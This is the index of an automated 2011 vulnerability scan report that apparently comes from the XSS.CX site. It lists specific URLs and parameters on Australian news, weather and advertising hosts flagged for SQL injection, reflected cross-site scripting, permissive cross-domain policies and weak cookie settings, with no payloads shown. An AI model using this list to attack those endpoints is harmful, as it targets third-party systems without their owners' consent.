XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, DORK, GHDB, BHDB, 09072011-02

Report generated by XSS.CX at Wed Sep 07 14:14:10 GMT-06:00 2011.

Public Domain Vulnerability Information, Security Articles, Vulnerability Reports, GHDB, DORK Search

XSS Home | XSS Crawler | SQLi Crawler | HTTPi Crawler | FI Crawler |
Loading

1. SQL injection

1.1. http://data.weatherzone.com.au/json/animator/ [df parameter]

1.2. http://tools.ntnews.com.au//admin/gallery_images/remote/2011/02/06/tn_165705.jpg [REST URL parameter 7]

1.3. http://tools.ntnews.com.au//admin/gallery_images/remote/2011/07/13/tn_197121.jpg [REST URL parameter 7]

1.4. http://tools.ntnews.com.au/photo-gallery/photo_galleries_js.php [category_id parameter]

1.5. http://tools.themercury.com.au/admin/gallery_images/remote/2011/09/06/345781.jpg [REST URL parameter 1]

1.6. http://tools.themercury.com.au/feeds/feed-with-lead.php [REST URL parameter 1]

1.7. http://tools.themercury.com.au/feeds/feed-with-lead.php [name of an arbitrarily supplied request parameter]

1.8. http://tools.themercury.com.au/yoursay/yoursay-single-extract.php [range parameter]

2. Cross-site scripting (reflected)

2.1. http://ad.agkn.com/iframe!t=1131! [clk1 parameter]

2.2. http://ad.agkn.com/iframe!t=1131! [mt_adid parameter]

2.3. http://ad.agkn.com/iframe!t=1131! [mt_id parameter]

2.4. http://ad.agkn.com/iframe!t=1131! [name of an arbitrarily supplied request parameter]

2.5. http://ad.agkn.com/iframe!t=1131! [name of an arbitrarily supplied request parameter]

2.6. http://ad.agkn.com/iframe!t=1131! [redirect parameter]

2.7. http://ad.turn.com/server/pixel.htm [fpid parameter]

2.8. http://ad.turn.com/server/pixel.htm [sp parameter]

2.9. http://ad.yieldmanager.com/st [name of an arbitrarily supplied request parameter]

2.10. http://ad.yieldmanager.com/st [name of an arbitrarily supplied request parameter]

2.11. http://adnxs.revsci.net/imp [Z parameter]

2.12. http://adnxs.revsci.net/imp [s parameter]

2.13. http://ads.adbrite.com/adserver/vdi/830697 [REST URL parameter 3]

2.14. http://ads.adbrite.com/adserver/vdi/830697 [r parameter]

2.15. http://adsfac.us/ag.asp [cc parameter]

2.16. http://api-public.addthis.com/url/shares.json [callback parameter]

2.17. http://b.scorecardresearch.com/beacon.js [c1 parameter]

2.18. http://b.scorecardresearch.com/beacon.js [c10 parameter]

2.19. http://b.scorecardresearch.com/beacon.js [c15 parameter]

2.20. http://b.scorecardresearch.com/beacon.js [c2 parameter]

2.21. http://b.scorecardresearch.com/beacon.js [c3 parameter]

2.22. http://b.scorecardresearch.com/beacon.js [c4 parameter]

2.23. http://b.scorecardresearch.com/beacon.js [c5 parameter]

2.24. http://b.scorecardresearch.com/beacon.js [c6 parameter]

2.25. http://data.weatherzone.com.au/json/animator/ [callback parameter]

2.26. http://feed.video.news.com.au/f/g5OqK/8MZ0EQEjgP7F/2120022090 [REST URL parameter 1]

2.27. http://feed.video.news.com.au/f/g5OqK/8MZ0EQEjgP7F/2120022090 [callback parameter]

2.28. http://feed.video.news.com.au/f/g5OqK/8MZ0EQEjgP7F/2120022090 [name of an arbitrarily supplied request parameter]

2.29. http://img.mediaplex.com/content/0/12963/135748/CGD_WatchESPN_300x250-2logos_9_6.js [mpck parameter]

2.30. http://img.mediaplex.com/content/0/12963/135748/CGD_WatchESPN_300x250-2logos_9_6.js [mpck parameter]

2.31. http://img.mediaplex.com/content/0/12963/135748/CGD_WatchESPN_300x250-2logos_9_6.js [mpvc parameter]

2.32. http://img.mediaplex.com/content/0/12963/135748/CGD_WatchESPN_300x250-2logos_9_6.js [mpvc parameter]

2.33. http://img.mediaplex.com/content/0/12963/135748/CGD_WatchESPN_728x90-2logos_9_6.js [mpck parameter]

2.34. http://img.mediaplex.com/content/0/12963/135748/CGD_WatchESPN_728x90-2logos_9_6.js [mpck parameter]

2.35. http://img.mediaplex.com/content/0/12963/135748/CGD_WatchESPN_728x90-2logos_9_6.js [mpvc parameter]

2.36. http://img.mediaplex.com/content/0/12963/135748/CGD_WatchESPN_728x90-2logos_9_6.js [mpvc parameter]

2.37. http://img.mediaplex.com/content/0/9608/119290/ph1-gps-findyourself-728x90.js [mpck parameter]

2.38. http://img.mediaplex.com/content/0/9608/119290/ph1-gps-findyourself-728x90.js [mpvc parameter]

2.39. http://img.mediaplex.com/content/0/9608/119290/ph2_misc_longterm_728x90.js [mpck parameter]

2.40. http://img.mediaplex.com/content/0/9608/119290/ph2_misc_longterm_728x90.js [mpvc parameter]

2.41. http://js.revsci.net/gateway/gw.js [csid parameter]

2.42. http://mozo-widgets.f2.com.au/images/sprite-widget-17.png [REST URL parameter 1]

2.43. http://mozo-widgets.f2.com.au/images/sprite-widget-17.png [REST URL parameter 2]

2.44. http://mozo-widgets.f2.com.au/images/sprite-widget-logos.png [REST URL parameter 1]

2.45. http://mozo-widgets.f2.com.au/images/sprite-widget-logos.png [REST URL parameter 2]

2.46. http://mozo-widgets.f2.com.au/widgets/multiwidget3/SMH/FM-BUSINESS [REST URL parameter 1]

2.47. http://mozo-widgets.f2.com.au/widgets/multiwidget3/SMH/FM-BUSINESS [REST URL parameter 2]

2.48. http://mozo-widgets.f2.com.au/widgets/multiwidget3/WAT/FM-NEWS [REST URL parameter 1]

2.49. http://mozo-widgets.f2.com.au/widgets/multiwidget3/WAT/FM-NEWS [REST URL parameter 2]

2.50. http://ndm.feeds.theplatform.com/ps/JSON/PortalService/2.1/getReleaseList [PID parameter]

2.51. http://ndm.feeds.theplatform.com/ps/JSON/PortalService/2.1/getReleaseList [callback parameter]

2.52. http://ndm.feeds.theplatform.com/ps/JSON/PortalService/2.1/getReleaseList [endIndex parameter]

2.53. http://ndm.feeds.theplatform.com/ps/JSON/PortalService/2.1/getReleaseList [query parameter]

2.54. http://ndm.feeds.theplatform.com/ps/JSON/PortalService/2.1/getReleaseList [startIndex parameter]

2.55. http://pixel.invitemedia.com/rubicon_sync [publisher_redirecturl parameter]

2.56. http://pluck.abc.net.au/ver1.0/daapi2.api [cb parameter]

2.57. http://pluck.abc.net.au/ver1.0/daapi2.api [jsonRequest parameter]

2.58. http://tools.ntnews.com.au/poll/poll.php [name of an arbitrarily supplied request parameter]

2.59. http://tools.themercury.com.au/feeds/feed-ticker.php [name of an arbitrarily supplied request parameter]

2.60. http://tools.themercury.com.au/feeds/feed-ticker.php [rss_name parameter]

2.61. http://tools.themercury.com.au/feeds/feed-with-lead.php [rss_name parameter]

2.62. http://tools.themercury.com.au/yoursay/yoursay-single-extract.php [range parameter]

2.63. http://tps30.doubleverify.com/visit.js [plc parameter]

2.64. http://tps30.doubleverify.com/visit.js [sid parameter]

2.65. http://web.adblade.com/imps.php [description_color parameter]

2.66. http://web.adblade.com/imps.php [name of an arbitrarily supplied request parameter]

2.67. http://web.adblade.com/imps.php [title_color parameter]

2.68. http://web.adblade.com/imps.php [tpUrl parameter]

2.69. http://webservice.theweather.com.au/ws1/wx.php [fc parameter]

2.70. http://www.7perth.com.au/javascript.js [a parameter]

2.71. http://www.7perth.com.au/view/2/ [name of an arbitrarily supplied request parameter]

2.72. http://www.7perth.com.au/view/about/ [name of an arbitrarily supplied request parameter]

2.73. http://www.7perth.com.au/view/seven-news/ [name of an arbitrarily supplied request parameter]

2.74. http://www.abc.net.au/perth/news/ [name of an arbitrarily supplied request parameter]

2.75. http://www.linkedin.com/countserv/count/share [url parameter]

2.76. http://adnxs.revsci.net/imp [Referer HTTP header]

2.77. http://feeds.mycareer.com.au/crossdomain.xml [REST URL parameter 1]

2.78. http://feeds.mycareer.com.au/jobresults [REST URL parameter 1]

2.79. http://optimized-by.rubiconproject.com/a/7725/12338/21770-15.js [ruid cookie]

2.80. http://optimized-by.rubiconproject.com/a/7725/12338/21770-2.js [ruid cookie]

2.81. http://optimized-by.rubiconproject.com/a/7725/12338/22678-15.js [ruid cookie]

2.82. http://optimized-by.rubiconproject.com/a/7725/12338/22678-2.js [ruid cookie]

2.83. http://optimized-by.rubiconproject.com/a/7725/12338/22682-15.js [ruid cookie]

2.84. http://optimized-by.rubiconproject.com/a/7725/12338/22682-2.js [ruid cookie]

2.85. http://optimized-by.rubiconproject.com/a/7856/12590/22782-15.html [ruid cookie]

2.86. http://optimized-by.rubiconproject.com/a/7856/12590/22782-15.js [ruid cookie]

2.87. http://optimized-by.rubiconproject.com/a/7856/12590/22782-2.html [ruid cookie]

2.88. http://optimized-by.rubiconproject.com/a/7856/12590/22893-15.html [ruid cookie]

2.89. http://optimized-by.rubiconproject.com/a/7856/12590/22893-2.html [ruid cookie]

2.90. http://optimized-by.rubiconproject.com/a/dk.js [ruid cookie]

2.91. http://optimized-by.rubiconproject.com/a/dk.js [ruid cookie]

3. Flash cross-domain policy

3.1. http://ad.agkn.com/crossdomain.xml

3.2. http://ad.turn.com/crossdomain.xml

3.3. http://adfarm.mediaplex.com/crossdomain.xml

3.4. http://adsfac.us/crossdomain.xml

3.5. http://b.scorecardresearch.com/crossdomain.xml

3.6. http://bh.contextweb.com/crossdomain.xml

3.7. http://bid.rb.ntc.ace.advertising.com/crossdomain.xml

3.8. http://bs.serving-sys.com/crossdomain.xml

3.9. http://cdn.turn.com/crossdomain.xml

3.10. http://cdn4.eyewonder.com/crossdomain.xml

3.11. http://content.yieldmanager.edgesuite.net/crossdomain.xml

3.12. http://d3.zedo.com/crossdomain.xml

3.13. http://d7.zedo.com/crossdomain.xml

3.14. http://e.yimg.com/crossdomain.xml

3.15. http://edge.aperture.displaymarketplace.com/crossdomain.xml

3.16. http://espn-media.unitedfuture.com.s3.amazonaws.com/crossdomain.xml

3.17. http://external.ak.fbcdn.net/crossdomain.xml

3.18. http://feed.video.news.com.au/crossdomain.xml

3.19. http://feeds.news.com.au/crossdomain.xml

3.20. http://g-pixel.invitemedia.com/crossdomain.xml

3.21. http://g.ca.bid.invitemedia.com/crossdomain.xml

3.22. http://hpi.rotator.hadj7.adjuggler.net/crossdomain.xml

3.23. http://i.w55c.net/crossdomain.xml

3.24. http://ib.adnxs.com/crossdomain.xml

3.25. http://img-cdn.mediaplex.com/crossdomain.xml

3.26. http://img.mediaplex.com/crossdomain.xml

3.27. http://js.revsci.net/crossdomain.xml

3.28. http://l.yimg.com/crossdomain.xml

3.29. http://m.xp1.ru4.com/crossdomain.xml

3.30. http://map.media6degrees.com/crossdomain.xml

3.31. http://ndm.feeds.theplatform.com/crossdomain.xml

3.32. http://pix04.revsci.net/crossdomain.xml

3.33. http://pixel.invitemedia.com/crossdomain.xml

3.34. http://pixel.quantserve.com/crossdomain.xml

3.35. http://pt200194.unica.com/crossdomain.xml

3.36. http://s0.2mdn.net/crossdomain.xml

3.37. http://s1.2mdn.net/crossdomain.xml

3.38. http://secure-au.imrworldwide.com/crossdomain.xml

3.39. http://statse.webtrendslive.com/crossdomain.xml

3.40. http://sync.mathtag.com/crossdomain.xml

3.41. http://tags.bluekai.com/crossdomain.xml

3.42. http://www.7perth.com.au/crossdomain.xml

3.43. http://www.abc.net.au/crossdomain.xml

3.44. http://www.weatherchannel.com.au/crossdomain.xml

3.45. http://yql.yahooapis.com/crossdomain.xml

3.46. http://adadvisor.net/crossdomain.xml

3.47. http://ads.adbrite.com/crossdomain.xml

3.48. http://api.tweetmeme.com/crossdomain.xml

3.49. http://au.adserver.yahoo.com/crossdomain.xml

3.50. http://au.news.yahoo.com/crossdomain.xml

3.51. http://au.pfinance.yahoo.com/crossdomain.xml

3.52. http://cm.au.thewest.overture.com/crossdomain.xml

3.53. http://cookex.amp.yahoo.com/crossdomain.xml

3.54. http://courses.mycareer.com.au/crossdomain.xml

3.55. http://feeds.mycareer.com.au/crossdomain.xml

3.56. http://media.perthnow.com.au/crossdomain.xml

3.57. http://optimized-by.rubiconproject.com/crossdomain.xml

3.58. http://pagead2.googlesyndication.com/crossdomain.xml

3.59. http://pluck.abc.net.au/crossdomain.xml

3.60. http://resources.news.com.au/crossdomain.xml

3.61. http://static.ak.fbcdn.net/crossdomain.xml

3.62. http://traktr.news.com.au/crossdomain.xml

3.63. http://webservice.theweather.com.au/crossdomain.xml

3.64. http://www.facebook.com/crossdomain.xml

3.65. http://www.smh.com.au/crossdomain.xml

3.66. http://www.watoday.com.au/crossdomain.xml

3.67. http://www.wtp101.com/crossdomain.xml

3.68. http://api.twitter.com/crossdomain.xml

3.69. http://matcher-rbc.bidder7.mookie1.com/crossdomain.xml

4. Silverlight cross-domain policy

4.1. http://b.scorecardresearch.com/clientaccesspolicy.xml

4.2. http://feed.video.news.com.au/clientaccesspolicy.xml

4.3. http://pixel.quantserve.com/clientaccesspolicy.xml

4.4. http://s0.2mdn.net/clientaccesspolicy.xml

4.5. http://s1.2mdn.net/clientaccesspolicy.xml

4.6. http://secure-au.imrworldwide.com/clientaccesspolicy.xml

5. Cleartext submission of password

5.1. http://www.abc.net.au/res/libraries/pluck/abc.pluck-1.latest.min.js

5.2. http://www.watoday.com.au/wa-news/thousands-of-wa-households-went-cold-and-hungry-abs-20110906-1jvz4.html

6. Session token in URL

7. Password field submitted using GET method

8. Cookie scoped to parent domain

8.1. http://api.twitter.com/1/statuses/user_timeline.json

8.2. http://a.triggit.com/pxrucm

8.3. http://ad.agkn.com/iframe!t=1131!

8.4. http://b.scorecardresearch.com/b

8.5. http://bh.contextweb.com/bh/rtset

8.6. http://bid.rb.ntc.ace.advertising.com/site=0000799975/size=728090/u=2/bnum=54069056/hr=14/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/tags=1/rubcpmprice=6F4E7BBBFD8CE677/istr=OTYwNDg0Ojc4OjA6MC4wMDA1ODQ2ODowLjAwMDU4NDY4OjAuMDAwNTg0Njg6MC4wMDA1NzMxODoxOjE6MC4wMDA1ODQ2ODowLjk3ODY0ODowLjAwMDUxMjg2NDY6MC4wMDA1ODkyODMzOjEzMTU0MDQwNjE6NTozOjEuMDIxMzUyOjAuMDAwNTEyODY0Ng/srcreq=8/bidtid=ASf536a25b934d4dbabaaf671365070601/guidm=1007:n4tx19dbice3prpg7887b1ymgzfc6iit/dref=http%253A%252F%252Fweather.news.com.au%252Fwa%252Fperth%252Fperth

8.7. http://bid.rb.ntc.ace.advertising.com/site=0000799975/size=728090/u=2/bnum=68910242/hr=14/hl=1/c=3/scres=5/swh=1920x1200/tile=2/f=2/r=1/optn=1/fv=10/aolexp=0/tags=1/rubcpmprice=01F5D655E2FFC4EB/istr=OTYwNDg0Ojc4OjA6MC4wMDA1ODQ2ODowLjAwMDU4NDY4OjAuMDAwNTg0Njg6MC4wMDA1NzMxODoxOjE6MC4wMDA1ODQ2ODowLjk3ODY0ODowLjAwMDUxMjg2NDY6MC4wMDA1ODkyODMzOjEzMTU0MDQwNjE6NTozOjEuMDIxMzUyOjAuMDAwNTEyODY0Ng/srcreq=8/bidtid=AS072e9051ae61480d8af8a5a920c43596/guidm=1007:n4tx19dbice3prpg7887b1ymgzfc6iit/dref=http%253A%252F%252Fweather.news.com.au%252Fwa%252Fperth%252Fperth

8.8. http://bid.rb.ntc.ace.advertising.com/site=0000799975/size=728090/u=2/bnum=70524729/hr=14/hl=1/c=3/scres=5/swh=1920x1200/tile=3/f=2/r=1/optn=1/fv=10/aolexp=0/tags=1/rubcpmprice=01F5D655E2FFC4EB/istr=OTYwNDg0Ojc4OjA6MC4wMDA1ODQ2ODowLjAwMDU4NDY4OjAuMDAwNTg0Njg6MC4wMDA1NzMxODoxOjE6MC4wMDA1ODQ2ODowLjk3ODY0ODowLjAwMDUxMjg2NDY6MC4wMDA1ODkyODMzOjEzMTU0MDQwNjE6NTozOjEuMDIxMzUyOjAuMDAwNTEyODY0Ng/srcreq=8/bidtid=AS2463e9943a804387a72e0e9f481b7178/guidm=1007:n4tx19dbice3prpg7887b1ymgzfc6iit/dref=http%253A%252F%252Fwww.perthnow.com.au%252F

8.9. http://cm.au.thewest.overture.com/js_flat_1_0/

8.10. http://d7.zedo.com/bar/v16-504/d3/jsc/gl.js

8.11. http://hpi.rotator.hadj7.adjuggler.net/servlet/ajrotator/130511/0/vj

8.12. http://hpi.rotator.hadj7.adjuggler.net/servlet/ajrotator/80617/0/vj

8.13. http://i.w55c.net/a.gif

8.14. http://i.w55c.net/m.gif

8.15. http://i.w55c.net/m_yahoo.gif

8.16. http://i.w55c.net/ping_match.gif

8.17. http://id.google.com/verify/EAAAAJ5qotIJ8Qa1PsQzLO_KCTk.gif

8.18. http://image2.pubmatic.com/AdServer/Pug

8.19. http://optimized-by.rubiconproject.com/a/7725/12338/21770-15.js

8.20. http://optimized-by.rubiconproject.com/a/7725/12338/21770-15.js

8.21. http://optimized-by.rubiconproject.com/a/7725/12338/21770-2.js

8.22. http://optimized-by.rubiconproject.com/a/7725/12338/21770-2.js

8.23. http://optimized-by.rubiconproject.com/a/7725/12338/22678-15.js

8.24. http://optimized-by.rubiconproject.com/a/7725/12338/22678-2.js

8.25. http://optimized-by.rubiconproject.com/a/7725/12338/22682-15.js

8.26. http://optimized-by.rubiconproject.com/a/7725/12338/22682-2.js

8.27. http://optimized-by.rubiconproject.com/a/7856/12590/22782-15.html

8.28. http://optimized-by.rubiconproject.com/a/7856/12590/22782-15.js

8.29. http://optimized-by.rubiconproject.com/a/7856/12590/22782-2.html

8.30. http://optimized-by.rubiconproject.com/a/7856/12590/22893-15.html

8.31. http://optimized-by.rubiconproject.com/a/7856/12590/22893-15.html

8.32. http://optimized-by.rubiconproject.com/a/7856/12590/22893-2.html

8.33. http://optimized-by.rubiconproject.com/a/dk.js

8.34. http://optimized-by.rubiconproject.com/a/dk.js

8.35. http://pixel.rubiconproject.com/tap.php

8.36. http://pixel.rubiconproject.com/tap.php

8.37. http://pixel.rubiconproject.com/tap.php

8.38. http://pixel.rubiconproject.com/tap.php

8.39. http://pixel.rubiconproject.com/tap.php

8.40. http://pixel.rubiconproject.com/tap.php

8.41. http://pixel.rubiconproject.com/tap.php

8.42. http://pixel.rubiconproject.com/tap.php

8.43. http://pixel.rubiconproject.com/tap.php

8.44. http://pixel.rubiconproject.com/tap.php

8.45. http://pixel.rubiconproject.com/tap.php

8.46. http://pluck.abc.net.au/ver1.0/daapi2.api

8.47. http://r1-ads.ace.advertising.com/site=782303/size=728090/u=2/bnum=36271028/hr=14/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.perthnow.com.au%252Fbusiness%252Fbusiness-old%252Ffraud-blackmail-in-latest-oswal-claims%252Fstory-e6frg2qu-1226131700884

8.48. http://r1-ads.ace.advertising.com/site=782303/size=728090/u=2/bnum=36912405/hr=14/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.ntnews.com.au%252F

8.49. http://r1-ads.ace.advertising.com/site=782303/size=728090/u=2/bnum=5306309/hr=14/hl=1/c=3/scres=5/swh=1920x1200/tile=2/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.ntnews.com.au%252F

8.50. http://r1-ads.ace.advertising.com/site=799695/size=300250/u=2/bnum=27560796/hr=14/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=

8.51. http://r1-ads.ace.advertising.com/site=799696/size=728090/u=2/bnum=35855233/hr=14/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.watoday.com.au%252F

8.52. http://r1-ads.ace.advertising.com/site=799696/size=728090/u=2/bnum=85535532/hr=14/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fnews.smh.com.au%252Fbreaking-news-national%252Fwa-labor-launches-another-bushfire-probe-20110907-1jx2h.html

8.53. http://r1-ads.ace.advertising.com/site=801645/size=728090/u=2/bnum=18256183/hr=14/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.perthnow.com.au%252F

8.54. http://r1-ads.ace.advertising.com/site=801647/size=300250/u=2/bnum=35058392/hr=14/hl=1/c=3/scres=5/swh=1920x1200/tile=2/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.perthnow.com.au%252F

8.55. http://rc.d.chango.com/m/rc

8.56. http://rp.gwallet.com/r1/ruum

8.57. http://tap.rubiconproject.com/oz/feeds/invite-media-rtb/tokens/

8.58. http://tap.rubiconproject.com/oz/feeds/targus/profile

8.59. http://user.lucidmedia.com/clicksense/user

8.60. http://www.abc.net.au/includes/scripts/global.js

8.61. http://www.abc.net.au/local/global_css/common_modules/house_ads_m12.css

8.62. http://www.abc.net.au/local/global_css/common_modules/latest_media_m21.css

8.63. http://www.abc.net.au/local/global_css/common_modules/m60_login.css

8.64. http://www.abc.net.au/local/global_css/common_modules/river_of_content_m20.css

8.65. http://www.abc.net.au/local/global_css/common_modules/site_search_m3.css

8.66. http://www.abc.net.au/local/global_css/common_modules/top_stories_m14.css

8.67. http://www.abc.net.au/local/global_css/news/styles.css

8.68. http://www.abc.net.au/local/global_css/palettes/generic.css

8.69. http://www.abc.net.au/local/global_css/palettes/paletteA.css

8.70. http://www.abc.net.au/local/global_css/styles.css

8.71. http://www.abc.net.au/local/global_css/template/styles.css

8.72. http://www.abc.net.au/local/global_css/yaml/central_draft.css

8.73. http://www.abc.net.au/local/global_css/yaml/core/slim_base.css

8.74. http://www.abc.net.au/local/global_scripts/contribute/functions.js

8.75. http://www.abc.net.au/local/global_scripts/general.min.js

8.76. http://www.abc.net.au/local/includes/scripts/city_include.js

8.77. http://www.abc.net.au/local/includes/scripts/jquery/plugins/jquery.tools.min.js

8.78. http://www.abc.net.au/local/includes/scripts/tabs_latest_media.js

8.79. http://www.abc.net.au/res/abc/styles/screen.css

8.80. http://www.abc.net.au/res/libraries/abcjs/abc.js

8.81. http://www.abc.net.au/res/libraries/jquery/jquery-latest.min.js

8.82. http://www.abc.net.au/res/libraries/pluck/abc.pluck-1.latest.min.js

8.83. http://www.wtp101.com/pull_sync

9. Cookie without HttpOnly flag set

9.1. http://www.6pr.com.au/

9.2. http://a.triggit.com/pxrucm

9.3. http://ad.agkn.com/iframe!t=1131!

9.4. http://ad.yabuka.com/statsin/adframe/693/300x250

9.5. http://ad.yieldmanager.com/iframe3

9.6. http://ad.yieldmanager.com/iframe3

9.7. http://ad.yieldmanager.com/imp

9.8. http://ad.yieldmanager.com/imp

9.9. http://adsfac.us/ag.asp

9.10. http://api.twitter.com/1/statuses/user_timeline.json

9.11. http://au.news.yahoo.com/thewest/a/-/wa/10210782/wildcats-abandon-bogut-for-nevill/

9.12. http://au.news.yahoo.com/thewest/business/

9.13. http://b.scorecardresearch.com/b

9.14. http://bh.contextweb.com/bh/rtset

9.15. http://bid.rb.ntc.ace.advertising.com/site=0000799975/size=728090/u=2/bnum=54069056/hr=14/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/tags=1/rubcpmprice=6F4E7BBBFD8CE677/istr=OTYwNDg0Ojc4OjA6MC4wMDA1ODQ2ODowLjAwMDU4NDY4OjAuMDAwNTg0Njg6MC4wMDA1NzMxODoxOjE6MC4wMDA1ODQ2ODowLjk3ODY0ODowLjAwMDUxMjg2NDY6MC4wMDA1ODkyODMzOjEzMTU0MDQwNjE6NTozOjEuMDIxMzUyOjAuMDAwNTEyODY0Ng/srcreq=8/bidtid=ASf536a25b934d4dbabaaf671365070601/guidm=1007:n4tx19dbice3prpg7887b1ymgzfc6iit/dref=http%253A%252F%252Fweather.news.com.au%252Fwa%252Fperth%252Fperth

9.16. http://bid.rb.ntc.ace.advertising.com/site=0000799975/size=728090/u=2/bnum=68910242/hr=14/hl=1/c=3/scres=5/swh=1920x1200/tile=2/f=2/r=1/optn=1/fv=10/aolexp=0/tags=1/rubcpmprice=01F5D655E2FFC4EB/istr=OTYwNDg0Ojc4OjA6MC4wMDA1ODQ2ODowLjAwMDU4NDY4OjAuMDAwNTg0Njg6MC4wMDA1NzMxODoxOjE6MC4wMDA1ODQ2ODowLjk3ODY0ODowLjAwMDUxMjg2NDY6MC4wMDA1ODkyODMzOjEzMTU0MDQwNjE6NTozOjEuMDIxMzUyOjAuMDAwNTEyODY0Ng/srcreq=8/bidtid=AS072e9051ae61480d8af8a5a920c43596/guidm=1007:n4tx19dbice3prpg7887b1ymgzfc6iit/dref=http%253A%252F%252Fweather.news.com.au%252Fwa%252Fperth%252Fperth

9.17. http://bid.rb.ntc.ace.advertising.com/site=0000799975/size=728090/u=2/bnum=70524729/hr=14/hl=1/c=3/scres=5/swh=1920x1200/tile=3/f=2/r=1/optn=1/fv=10/aolexp=0/tags=1/rubcpmprice=01F5D655E2FFC4EB/istr=OTYwNDg0Ojc4OjA6MC4wMDA1ODQ2ODowLjAwMDU4NDY4OjAuMDAwNTg0Njg6MC4wMDA1NzMxODoxOjE6MC4wMDA1ODQ2ODowLjk3ODY0ODowLjAwMDUxMjg2NDY6MC4wMDA1ODkyODMzOjEzMTU0MDQwNjE6NTozOjEuMDIxMzUyOjAuMDAwNTEyODY0Ng/srcreq=8/bidtid=AS2463e9943a804387a72e0e9f481b7178/guidm=1007:n4tx19dbice3prpg7887b1ymgzfc6iit/dref=http%253A%252F%252Fwww.perthnow.com.au%252F

9.18. http://cm.au.thewest.overture.com/js_flat_1_0/

9.19. http://d7.zedo.com/bar/v16-504/d3/jsc/gl.js

9.20. http://hpi.rotator.hadj7.adjuggler.net/servlet/ajrotator/130511/0/vj

9.21. http://hpi.rotator.hadj7.adjuggler.net/servlet/ajrotator/80617/0/vj

9.22. http://i.w55c.net/a.gif

9.23. http://i.w55c.net/m.gif

9.24. http://i.w55c.net/m_yahoo.gif

9.25. http://i.w55c.net/ping_match.gif

9.26. http://image2.pubmatic.com/AdServer/Pug

9.27. http://optimized-by.rubiconproject.com/a/7725/12338/21770-15.js

9.28. http://optimized-by.rubiconproject.com/a/7725/12338/21770-15.js

9.29. http://optimized-by.rubiconproject.com/a/7725/12338/21770-2.js

9.30. http://optimized-by.rubiconproject.com/a/7725/12338/21770-2.js

9.31. http://optimized-by.rubiconproject.com/a/7725/12338/22678-15.js

9.32. http://optimized-by.rubiconproject.com/a/7725/12338/22678-2.js

9.33. http://optimized-by.rubiconproject.com/a/7725/12338/22682-15.js

9.34. http://optimized-by.rubiconproject.com/a/7725/12338/22682-2.js

9.35. http://optimized-by.rubiconproject.com/a/7856/12590/22782-15.html

9.36. http://optimized-by.rubiconproject.com/a/7856/12590/22782-15.js

9.37. http://optimized-by.rubiconproject.com/a/7856/12590/22782-2.html

9.38. http://optimized-by.rubiconproject.com/a/7856/12590/22893-15.html

9.39. http://optimized-by.rubiconproject.com/a/7856/12590/22893-15.html

9.40. http://optimized-by.rubiconproject.com/a/7856/12590/22893-2.html

9.41. http://optimized-by.rubiconproject.com/a/dk.js

9.42. http://optimized-by.rubiconproject.com/a/dk.js

9.43. http://pixel.rubiconproject.com/tap.php

9.44. http://pixel.rubiconproject.com/tap.php

9.45. http://pixel.rubiconproject.com/tap.php

9.46. http://pixel.rubiconproject.com/tap.php

9.47. http://pixel.rubiconproject.com/tap.php

9.48. http://pixel.rubiconproject.com/tap.php

9.49. http://pixel.rubiconproject.com/tap.php

9.50. http://pixel.rubiconproject.com/tap.php

9.51. http://pixel.rubiconproject.com/tap.php

9.52. http://pixel.rubiconproject.com/tap.php

9.53. http://pixel.rubiconproject.com/tap.php

9.54. http://pluck.abc.net.au/ver1.0/daapi2.api

9.55. http://r1-ads.ace.advertising.com/site=782303/size=728090/u=2/bnum=36271028/hr=14/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.perthnow.com.au%252Fbusiness%252Fbusiness-old%252Ffraud-blackmail-in-latest-oswal-claims%252Fstory-e6frg2qu-1226131700884

9.56. http://r1-ads.ace.advertising.com/site=782303/size=728090/u=2/bnum=36912405/hr=14/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.ntnews.com.au%252F

9.57. http://r1-ads.ace.advertising.com/site=782303/size=728090/u=2/bnum=5306309/hr=14/hl=1/c=3/scres=5/swh=1920x1200/tile=2/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.ntnews.com.au%252F

9.58. http://r1-ads.ace.advertising.com/site=799695/size=300250/u=2/bnum=27560796/hr=14/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=

9.59. http://r1-ads.ace.advertising.com/site=799696/size=728090/u=2/bnum=35855233/hr=14/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.watoday.com.au%252F

9.60. http://r1-ads.ace.advertising.com/site=799696/size=728090/u=2/bnum=85535532/hr=14/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fnews.smh.com.au%252Fbreaking-news-national%252Fwa-labor-launches-another-bushfire-probe-20110907-1jx2h.html

9.61. http://r1-ads.ace.advertising.com/site=801645/size=728090/u=2/bnum=18256183/hr=14/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.perthnow.com.au%252F

